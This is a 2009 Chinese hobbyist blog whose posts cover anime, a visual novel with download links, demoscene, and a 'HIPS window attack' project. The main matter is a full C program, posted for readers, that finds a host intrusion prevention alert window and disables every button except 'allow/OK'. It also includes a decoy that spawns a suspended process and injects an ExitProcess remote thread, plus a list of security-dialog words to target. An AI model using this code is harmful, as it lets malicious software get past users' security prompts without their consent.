2009年3月31日 星期二

青春禁止~!恋愛禁止!告白禁止!偶然禁止!絶対禁止!何が何でも禁止~!


Princess Party ~プリンセスパーティー~



在经历了数次被宣传视频(nico:sm6136228)洗脑后,今天终于成功入手了Princess Party,只可惜是日文版的,玩不懂...

还是让它先跟狭小硬盘空间里静静的躺一段时间好了~

宣传视频其二:ze5665466


ブランド CIRCUS
ジャンル アドベンチャー
発売日 ◆初回限定版 2009年3月27日
対応OS Windows 2000/XP/Vista 日本語版
メディア DVD-ROM

JAN ◆初回限定版
4540295001383
定価 ◆初回限定版
7,140円(税込)/6,800円(税抜)

対象年齢 18歳未満購入禁止
CIRCUS/2009年3月27日/7140円


下载地址:
Part1:http://anime.hloli.net/share?down=4f4eed8522efad4e
Part2:http://anime.hloli.net/share?down=cbd732ab35ce2c7b

2009年3月23日 星期一

从一开始就白忙活了 T_T (window attack) ...


代码还是发出来好了(对于细心的人来说,这些代码并不是一点用也没有的)...


我从一开始就白忙活了,原以为已经很周全了的,可是被一个Esc全给我阻止了 T_T


当然,如果你和我一样是个COMODO用户的话,遇到这个代码也就只能认命了~


由于内心刚刚经历了如下过程,现在我得修养生息去了...





















Heuristic manual HIPS window attack (defective)

#define _WIN32_WINNT 0x0501

#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>

#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")

#pragma comment(linker, "/SECTION:.wye,ERW /MERGE:.data=.wye /MERGE:.text=.wye /MERGE:.rdata=.wye" )

#define NUM_OF_WHITE_LIST_WORDS ((int)(sizeof WhiteList /sizeof WhiteList[0]))


struct
{
    char * Word;
}

WhiteList[]=
{
    "允许","allow","确定","ok","apply"
};


//To block it , press 'Esc' on the alarm window
DWORD WINAPI Feint(LPVOID lpParameter)
{
    STARTUPINFO StartupInfo;
    PROCESS_INFORMATION ProcessInfo;
    ZeroMemory(&StartupInfo,sizeof(StartupInfo));
    StartupInfo.cb = sizeof(STARTUPINFO);
   
    CreateProcess(0,"winlogon",0,0,0,CREATE_SUSPENDED,0,0,&StartupInfo,&ProcessInfo);
    CloseHandle(
        CreateRemoteThread(ProcessInfo.hProcess,0,0,(LPTHREAD_START_ROUTINE)
        GetProcAddress(LoadLibrary("kernel32.dll"), "ExitProcess"),0,0,0));
    CloseHandle(ProcessInfo.hProcess);
    CloseHandle(ProcessInfo.hThread);
    return 1;
}

BOOL CALLBACK EnumWindProc(HWND hWnd, LPARAM HIPS_PID)
{
    DWORD WPID;
    GetWindowThreadProcessId(hWnd,&WPID);
    if (WPID==HIPS_PID) //For EnumWindows
    {
        //0x19 //SetParent
        EnumChildWindows(hWnd,EnumWindProc,WPID+1);
    }
    else if (WPID+1==HIPS_PID && IsWindowEnabled(hWnd)) //For EnumChildWindows
    {
        char Title[1204];
        int n=0;
        GetWindowText(hWnd,Title,1024);
        strlwr(Title);
        for (n;n<NUM_OF_WHITE_LIST_WORDS;n++)
        {
            if (strstr(Title,WhiteList[n].Word))
            {
                break;
            }
        }
        if (n==NUM_OF_WHITE_LIST_WORDS)
        {
            //To destory it,SetParent
            EnableWindow(hWnd,FALSE);
        }                    
    }

    return TRUE;
}

void main()
{
    printf("Heuristic manual HIPS window attack (defective)\n"
           "Presented by wye-MIA kid C!\n"
           "http://wye-ANGer.blogspot.com\n");
    char Title[32] = "No manual HIPS detected - -";
    SetConsoleTitle(Title);
    HANDLE hMajor=CreateThread(NULL,NULL,Feint,NULL,NULL,NULL);
    DWORD hPID,pPID;
    HWND hHIPS=GetConsoleWindow()
        ,hCur=hHIPS;

    //Get parent process ID

    HANDLE SnapShotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    PROCESSENTRY32 pBuffer={0};
    pBuffer.dwSize=sizeof(PROCESSENTRY32);

    if((SnapShotHandle!=INVALID_HANDLE_VALUE) && Process32First(SnapShotHandle,&pBuffer))
    {
        while (Process32Next(SnapShotHandle,&pBuffer))
        {
            if (pBuffer.th32ProcessID==GetCurrentProcessId())
            {
                pPID=pBuffer.th32ParentProcessID;
                hPID=pPID;
                break;
            }
        }
    }
    while(WaitForSingleObject(hMajor,333)==WAIT_TIMEOUT)
    {
        //To protect major from activity analysis, return

        while(hHIPS==hCur||hPID==pPID||!hHIPS)
        {
            hHIPS=GetForegroundWindow();
            GetWindowThreadProcessId(hHIPS,&hPID);
            Sleep(333);
        }
        sprintf(Title,"Manual HIPS detected~ PID:%d",hPID);
       
        SetConsoleTitle(Title);
        EnumWindows(EnumWindProc,hPID);
    }

    Sleep(6000);
    return ;
}

2009年3月21日 星期六

低级启发式Window Attack

虽然我有说直接放代码来着,可是等到真正完成的时候却有点不想放...

反正这也是人之常情嘛~

我就还是先发bin好啦~



曾经使用过的黑名单

WordsToAttack[]=

{

"规则","rule","许可","polic","阻止","block","结束","kill","end"

,"terminate","选项","option","设置","setting","配置","config",

"profile","模式","mode","关闭","close","退出","exit","取消",

"cancel","作为","treat"," as","隔离","isolate"

}



佯攻代码如下:

CreateProcess(0,"winlogon",0,0,0,CREATE_SUSPENDED,0,0,&StartupInfo,&ProcessInfo);

CloseHandle(

CreateRemoteThread(ProcessInfo.hProcess,0,0,(LPTHREAD_START_ROUTINE)

GetProcAddress(LoadLibrary("kernel32.dll"), "ExitProcess"),0,0,0));







WindowAttack.7z(通行证:wye)



2009-3-22 第一次更新

暂时先不发代码果然是正确的决定呢~



更新内容简述一下~

1.降低代码攻击性,解决了SetParent法造成的COMODO出错退出的问题

2.增加了对手动HIPS的检测结果的显示



这回应该就没什么问题了吧~了吧~



2009-3-22 夜

代码更新,将黑名单法改为白名单法

问题越来越简单化了~

之前的一些小聪明也越来越没用了 - -

代码也越来越和平化、弱智化了...........

...

...

哎~

既然问题都变得如此好解决了,那我就吧代码稍微整理一下贴出来好了。

切,真不爽!

-----------宅人的分割线------------

Lucky Star追完了,彻底被 柊つかさ 给治愈了~



再度展开追逐~

食灵-零

2009年3月15日 星期日

低级启发式逆推 HIPS (待续)

实验终止,发现之前的思路存在极大的错误(把HIPS与用户交互的进程搞挂了,后台的服务进程还是在发挥着作用)。

新的思路已经诞生,但由于最近从微软手里搜刮到了一个导出了4个非常非常非常友爱的函数的DLL...

我已经没有心情与精力再来针对新的思路搞太多的测试了。过一段时间后直接放代码...

2009年3月13日 星期五

CLANNAD AS最终话

看完之后的第一想法就是:汐的属性值已经完全超过凉宫春日了么?

(把旧的世界破坏,重新构造出新的小镇)



本来都已经充分做好泪目的心理准备的说...

结果最后被风子给逗笑了...

说是最终话,结果还是和上部一样依然见到预告了...





语无伦次了...

啊!语无伦次了...

语无伦次了...



------AS记录完毕------



主要是对最近新出的那些后宫类动画有些审美疲劳了...

对于新番貌似没有几个感兴趣的...

对那个伪娘与百合的故事又不太热衷..

本来想着AS一完,就开始追 凉宫春日的忧郁 来着,但是没想到我仅用了两个晚上就给追完了...

不过,新的追逐已经开始,就决定是你了!Lucky Star!

2009年3月7日 星期六

关于(About)

借着与鸟交换连接,简单说明一下好了。



此blog新建不久,并且仍处于建设状态,为本人前一段时间更换blog之产物..





--------起源、意义--------



原blog的访问量之中,同学与网友的访问次数可以说各占一半。



但由于共同兴趣的极大差异,经常会出现 同学/网友 完全看不懂blog内容尴尬。



本是想通过详细的文章分类来缓解这一尴尬的.



但谁叫我比较懒呢...



再加上有些真相还是有必要隐藏的...



于是此blog与wye的另一碎块儿便应运而生。



而此处碎块的内容儿则主要是本人宅生活的记录。



至此,此blog也便成为了另大多数人难以理解的存在。





--------本人--------



在这里仅介绍与此blog相关的部分好了。



计算机:对各方面都很感兴趣,尤其对编程、Demoscene、安全相关,很感兴趣,但均处于菜鸟阶段。



ACG:

首先说,本人性别为男!并且无BL向、伪娘向!



本人虽然很宅,但是对于ACG方面还是涉足未深,开始下载动画看也不过是一年前的事情。

如果以在家时间来衡量宅度的话,我可以算是究极。

但是如果以对ACG的了解程度来衡量的话,我还没入门。(前几天才刚刚知道 東方 的存在)



就说这些好了。



--



扯点别的,发现一个很奇异的现象:



在我宣布换blog之后,次日旧blog的日访问量便翻了一倍,并稳定持续到现在...

而我的两个新blog的访问量怎么就是比不上呢?

这是为什么呢?

2009年3月2日 星期一

Breakpoint 2009

最近成天发ACG...

虽说我只是个架空的马甲而已...

偶尔也Nerd一下好了...



今年的invitation在出现的当天我就给下载了...

但无奈,"Your display adapter has only 2 multitexturing units,and 4 is needed"

原以为家里这台古董看invitation还是勉强能应付过去的说。

没辙,下高清MP4好了。

同时注意到了一点,这回的data目录没有压缩/加密!

嗯~不错!



高清MP4看了看,清晰度太高,古董仍然受不了,mplayer播放时A-V同步不能...

很勉强的看了一遍,总的来说,比起今年的Every Thing is Under Control,还是更喜欢去年的DIGITAL Garden,去年的invitation的音乐真的很赞!

不过,invitation还是不能说明什么实质性的内容的。

还是相信今年的参赛团队们一定可以产生更多的经典的~

( 虽然我看不到... -_____,- )





啊啊啊啊啊!

通过这两天的洗脑,我俨然被麦当劳叔叔与二小姐给共同侵蚀了...

蓝蓝路~!

2009年3月1日 星期日

可怜的团子们啊

今日又发现一处宅腐栖息地...



话说这年头腐女这一生物的平均属性值俨然高过宅男了...



在草泥马大军的席卷下,だんご大家族也不幸遇难了...



http://acfun.cn/html/music/20090203/19643.html